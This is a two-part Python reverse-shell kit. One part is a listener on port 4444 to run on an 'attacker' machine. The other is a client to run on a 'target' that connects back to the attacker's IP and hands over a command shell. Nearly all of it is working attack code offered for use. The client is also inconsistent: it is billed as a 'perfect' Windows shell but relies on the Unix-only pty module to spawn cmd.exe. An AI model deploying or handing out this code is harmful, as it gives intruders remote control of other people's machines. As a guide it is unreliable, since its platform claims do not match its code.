SERVER – Run this FIRST on your machine (Attacker)



import socket
s = socket.socket()
s.bind(("0.0.0.0", 4444))
s.listen(1)
print("Listening on 4444...")
c, a = s.accept()
print(f"[+] Shell from {a}")
while True:
    cmd = input("shell> ")
    if cmd.lower() in ["exit", "quit"]:
        break
    c.send(cmd.encode() + b"\n")
    print(c.recv(10240).decode(errors="ignore"), end="")
c.close()
s.close()


CLIENT – Run this on the Target machine


# Client – Perfect one-block Windows reverse shell (2025 labs)
import socket, pty, os

ip   = "10.10.10.10"    # ← CHANGE TO YOUR ATTACKER IP
port = 4444             # ← change only if you want

s = socket.socket()
s.connect((ip, port))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("cmd.exe")
s.close()
